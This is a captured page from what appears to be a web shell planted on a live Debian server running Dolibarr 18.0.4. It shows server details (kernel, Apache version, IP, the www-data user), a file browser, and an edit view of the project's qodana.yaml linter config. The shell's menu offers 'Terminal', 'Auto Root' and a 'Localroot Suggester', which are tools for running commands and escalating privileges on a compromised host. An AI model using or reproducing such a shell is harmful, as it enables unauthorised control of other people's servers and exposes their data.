Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
dolibarr-18.0.4 /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
.idea
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
htdocs
[ DIR ]
drwxr-xr-x
2025-11-25 20:10
scripts
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
.gitmessage
251
B
-rw-r--r--
2023-12-15 13:44
.stickler.yml
211
B
-rw-r--r--
2023-12-15 13:44
COPYING
34.33
KB
-rw-r--r--
2023-12-15 13:44
COPYRIGHT
6.82
KB
-rw-r--r--
2023-12-15 13:44
ChangeLog
533.01
KB
-rw-r--r--
2023-12-15 13:44
DCO
1.33
KB
-rw-r--r--
2023-12-15 13:44
README-FR.md
7.83
KB
-rw-r--r--
2023-12-15 13:44
README.md
9.97
KB
-rw-r--r--
2023-12-15 13:44
SECURITY.md
7.36
KB
-rw-r--r--
2023-12-15 13:44
composer.json.disabled
1.78
KB
-rw-r--r--
2023-12-15 13:44
nightwatch.conf.js
741
B
-rw-r--r--
2023-12-15 13:44
phpstan.neon
2.25
KB
-rw-r--r--
2023-12-15 13:44
qodana.yaml
4.73
KB
-rw-r--r--
2023-12-15 13:44
robots.txt
95
B
-rw-r--r--
2023-12-15 13:44
Save
Rename
version: "1.0" linter: jetbrains/qodana-php:2023.1-eap failThreshold: 20000 profile: name: qodana.recommended exclude: - name: All paths: - dev - build - doc - documents - node_modules - test - htdocs/custom - htdocs/includes - htdocs/install/doctemplates - htdocs/modulebuilder/template/test/phpunit/functionnal - htdocs/theme/common/fontawesome-5 - name: PhpIssetCanBeReplacedWithCoalesceInspection - name: PhpRedundantOptionalArgumentInspection - name: PhpLanguageLevelInspection - name: PhpIncludeInspection - name: HtmlWrongAttributeValue - name: PhpUndefinedClassConstantInspection - name: RegExpRedundantEscape - name: PhpUnnecessaryLocalVariableInspection - name: PhpUnusedParameterInspection - name: PhpUnusedLocalVariableInspection - name: PhpTernaryExpressionCanBeReplacedWithConditionInspection - name: PhpSwitchStatementWitSingleBranchInspection - name: PhpLoopCanBeReplacedWithImplodeInspection - name: PhpArrayAccessCanBeReplacedWithForeachValueInspection - name: PhpArrayPushWithOneElementInspection - name: PhpCastIsUnnecessaryInspection - name: PhpDeprecationInspection - name: PhpStatementHasEmptyBodyInspection - name: PhpConditionAlreadyCheckedInspection - name: PhpExpressionResultUnusedInspection - name: PhpUndefinedClassInspection - name: RegExpSimplifiable - name: PhpConcatenationWithEmptyStringCanBeInlinedInspection - name: PhpConditionCanBeReplacedWithMinMaxCallInspection - name: PhpArrayIsAlwaysEmptyInspection - name: PhpParameterByRefIsNotUsedAsReferenceInspection - name: PhpWrongStringConcatenationInspection - name: PhpUnusedAliasInspection - name: PhpUnusedPrivateMethodInspection - name: PhpUnusedPrivateFieldInspection - name: PhpExpressionAlwaysNullInspection - name: PhpIfWithCommonPartsInspection - name: PhpTernaryExpressionCanBeReducedToShortVersionInspection - name: PhpExpressionWithSameOperandsInspection - name: PhpInArrayCanBeReplacedWithComparisonInspection - name: PhpUnusedAliasInspection - name: PhpPossiblePolymorphicInvocationInspection - name: PhpReturnValueOfMethodIsNeverUsedInspection - name: PhpPregReplaceWithEmptyReplacementInspection - name: PhpFieldImmediatelyRewrittenInspection - name: PhpIllegalStringOffsetInspection - name: PhpWrongForeachArgumentTypeInspection - name: PhpRegExpRedundantModifierInspection - name: PhpClassConstantAccessedViaChildClassInspection - name: RegExpUnnecessaryNonCapturingGroup - name: PhpPregMatchReplaceWithComparisonInspection - name: PhpArrayWriteIsNotUsedInspection - name: PhpUndefinedNamespaceInspection - name: PhpArraySearchInBooleanContextInspection - name: PhpLoopCanBeReplacedWithStrRepeatInspection - name: PhpPropertyOnlyWrittenInspection - name: PhpCoveredCharacterInClassInspection - name: PhpSameParameterValueInspection - name: PhpSillyAssignmentInspection - name: PhpConditionCheckedByNextConditionInspection - name: RegExpSingleCharAlternation - name: PhpSuspiciousNameCombinationInspection - name: PhpObjectFieldsAreOnlyWrittenInspection - name: PhpMissingParentConstructorInspection - name: PhpWriteAccessToReferencedArrayValueWithoutUnsetInspection - name: PhpArrayUsedOnlyForWriteInspection - name: PhpArrayIndexImmediatelyRewrittenInspection - name: PhpParameterNameChangedDuringInheritanceInspection - name: PhpDuplicateSwitchCaseBodyInspection - name: PhpNestedDirNameCallsCanBeReplacedWithLevelParameterInspection - name: PhpPointlessBooleanExpressionInConditionInspection - name: PhpUndefinedMethodInspection - name: PhpDuplicateCatchBodyInspection - name: PhpDefineCanBeReplacedWithConstInspection - name: PhpMissingParamTypeInspection - name: PhpMissingReturnTypeInspection - name: CommaExpressionJS - name: JSTypeOfValues - name: PhpRedundantVariableDocTypeInspection - name: PhpUnhandledExceptionInspection - name: JSIgnoredPromiseFromCall - name: DuplicatedCode - name: BadExpressionStatementJS - name: PhpRedundantCatchClauseInspection - name: PhpIssetCanCheckNestedAccessDirectlyInspection - name: JSEqualityComparisonWithCoercion - name: JSUnusedAssignment - name: JSHint - name: ReservedWordUsedAsNameJS - name: JSUnusedLocalSymbols - name: TrivialIfJS - name: JSJQueryEfficiency - name: JSDuplicatedDeclaration - name: JSUnresolvedLibraryURL - name: UnnecessaryReturnJS - name: UnreachableCodeJS - name: JSUnnecessarySemicolon - name: JSPrimitiveTypeWrapperUsage - name: PhpFullyQualifiedNameUsageInspection - name: PhpDocMissingThrowsInspection - name: UnnecessaryLabelJS - name: JSCheckFunctionSignatures - name: JSValidateTypes - name: PhpReturnDocTypeMismatchInspection - name: PhpSwitchWithCommonPartsInspection